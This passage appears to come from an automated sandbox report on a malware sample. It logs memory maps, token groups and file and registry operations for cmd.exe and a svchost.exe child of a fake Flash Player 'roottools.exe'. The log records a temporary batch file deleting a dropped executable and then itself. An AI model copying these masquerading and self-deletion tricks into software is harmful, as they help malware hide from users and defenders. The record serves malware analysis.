  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7FC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000f0000 0x000f0000 0x001effff Private Memory Readable, Writable True True False
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True True False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True True False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003affff Private Memory Readable, Writable True True False
private_0x0000000000440000 0x00440000 0x004bffff Private Memory Readable, Writable True True False
pagefile_0x00000000004c0000 0x004c0000 0x00647fff Pagefile Backed Memory Readable True False False
private_0x0000000000690000 0x00690000 0x0078ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000790000 0x00790000 0x00910fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000920000 0x00920000 0x01d1ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001d20000 0x01d20000 0x02062fff Pagefile Backed Memory Readable True False False
cmd.exe 0x49fa0000 0x49febfff Memory Mapped File Readable, Writable, Executable True False False
wow64cpu.dll 0x746f0000 0x746f7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74700000 0x7475bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74760000 0x7479efff Memory Mapped File Readable, Writable, Executable False False False
winbrand.dll 0x74870000 0x74876fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Threads
Thread 0x7fc
(Host: 96, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-10 18:52:59 (UTC) True 1
Fn
System Get Time type = Ticks, time = 156422 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x49fa0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75a1a84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75a04a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75a1a79d True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x75702102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x75703352 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x75703825 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 200 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 189 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 185 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = file_attributes True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 127 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
File Read filename = STD_INPUT_HANDLE, size = 8191, size_out = 63 True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, type = file_attributes True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 2
Fn
File Write filename = STD_ERROR_HANDLE, size = 33 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #12: svchost.exe
(Host: 2174, Network: 23)
+
Information Value
ID #12
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:03:34, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:06:39
OS Process Information
+
Information Value
PID 0x634
Parent PID 0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5A0
0x 948
0x A10
0x 918
0x 910
0x 84
0x A60
0x 98C
0x 9C4
0x C4
0x 984
0x 978
0x 95C
0x A70
0x 138
0x 708
0x AFC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False
private_0x00000000000b0000 0x000b0000 0x000cbfff Private Memory Readable, Writable, Executable True False False
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False
rsaenh.dll 0x00160000 0x0019bfff Memory Mapped File Readable False False False
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x00170000 0x00170fff Memory Mapped File Readable False False False
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000180000 0x00180000 0x001bffff Private Memory Readable, Writable True False False
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False
index.dat 0x001e0000 0x001ebfff Memory Mapped File Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False
index.dat 0x00270000 0x00277fff Memory Mapped File Readable, Writable True False False
index.dat 0x00280000 0x0028ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x002bffff Private Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x00290fff Private Memory Readable, Writable True False False
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b0fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True False False
private_0x0000000000350000 0x00350000 0x0038ffff Private Memory Readable, Writable True False False
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True False False
private_0x00000000003e0000 0x003e0000 0x0041ffff Private Memory Readable, Writable True False False
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x004fffff Private Memory Readable, Writable True False False
private_0x0000000000510000 0x00510000 0x0054ffff Private Memory Readable, Writable True False False
private_0x0000000000550000 0x00550000 0x0058ffff Private Memory Readable, Writable True False False
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False
pagefile_0x00000000006b0000 0x006b0000 0x00837fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000840000 0x00840000 0x009c0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000009d0000 0x009d0000 0x00dc2fff Pagefile Backed Memory Readable True False False
private_0x0000000000dd0000 0x00dd0000 0x00f4ffff Private Memory Readable, Writable True False False
private_0x0000000000dd0000 0x00dd0000 0x00e0ffff Private Memory Readable, Writable True False False
private_0x0000000000e30000 0x00e30000 0x00e6ffff Private Memory Readable, Writable True False False
private_0x0000000000ed0000 0x00ed0000 0x00f4ffff Private Memory Readable, Writable True False False
private_0x0000000000f50000 0x00f50000 0x00f8ffff Private Memory Readable, Writable True False False
private_0x0000000000f90000 0x00f90000 0x00fcffff Private Memory Readable, Writable True False False
svchost.exe 0x00fe0000 0x00fe7fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000ff0000 0x00ff0000 0x023effff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x023f0000 0x026befff Memory Mapped File Readable False False False
private_0x00000000026d0000 0x026d0000 0x0270ffff Private Memory Readable, Writable True False False
private_0x0000000002730000 0x02730000 0x0276ffff Private Memory Readable, Writable True False False
private_0x0000000002770000 0x02770000 0x027affff Private Memory Readable, Writable True False False
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False
private_0x00000000027f0000 0x027f0000 0x0282ffff Private Memory Readable, Writable True False False
private_0x0000000002830000 0x02830000 0x0286ffff Private Memory Readable, Writable True False False
private_0x0000000002880000 0x02880000 0x028bffff Private Memory Readable, Writable True False False
private_0x00000000028e0000 0x028e0000 0x0291ffff Private Memory Readable, Writable True False False
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False
private_0x0000000002990000 0x02990000 0x029cffff Private Memory Readable, Writable True False False
private_0x00000000029d0000 0x029d0000 0x02beffff Private Memory Readable, Writable True False False
private_0x00000000029d0000 0x029d0000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002a10000 0x02a10000 0x02a4ffff Private Memory Readable, Writable True False False
private_0x0000000002a90000 0x02a90000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002bb0000 0x02bb0000 0x02beffff Private Memory Readable, Writable True False False
private_0x0000000002bf0000 0x02bf0000 0x02ceffff Private Memory Readable, Writable True False False
private_0x0000000002cf0000 0x02cf0000 0x02e4ffff Private Memory Readable, Writable True False False
private_0x0000000002cf0000 0x02cf0000 0x02e2ffff Private Memory Readable, Writable True False False
private_0x0000000002d80000 0x02d80000 0x02dbffff Private Memory Readable, Writable True False False
private_0x0000000002e40000 0x02e40000 0x02e4ffff Private Memory Readable, Writable True False False
private_0x0000000002e50000 0x02e50000 0x0301ffff Private Memory Readable, Writable True False False
private_0x0000000002e50000 0x02e50000 0x02e8ffff Private Memory Readable, Writable True False False
comctl32.dll 0x73b20000 0x73cbdfff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x745c0000 0x745cdfff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x745d0000 0x74629fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74630000 0x74635fff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746f0000 0x746f7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74700000 0x7475bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74760000 0x7479efff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x747a0000 0x747affff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x747b0000 0x747b5fff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x747c0000 0x747d4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x747e0000 0x74831fff Memory Mapped File Readable, Writable, Executable False False False
schannel.dll 0x74840000 0x74879fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74880000 0x748bafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x748c0000 0x748d5fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x748e0000 0x748e7fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x748f0000 0x748fcfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74900000 0x74916fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74920000 0x74926fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74930000 0x7494bfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74950000 0x74993fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74cb0000 0x74cbafff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75650000 0x756d2fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
wintrust.dll 0x76bf0000 0x76c1cfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef92000 0x7ef92000 0x7ef94fff Private Memory Readable, Writable True False False
private_0x000000007ef95000 0x7ef95000 0x7ef97fff Private Memory Readable, Writable True False False
private_0x000000007ef98000 0x7ef98000 0x7ef9afff Private Memory Readable, Writable True False False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
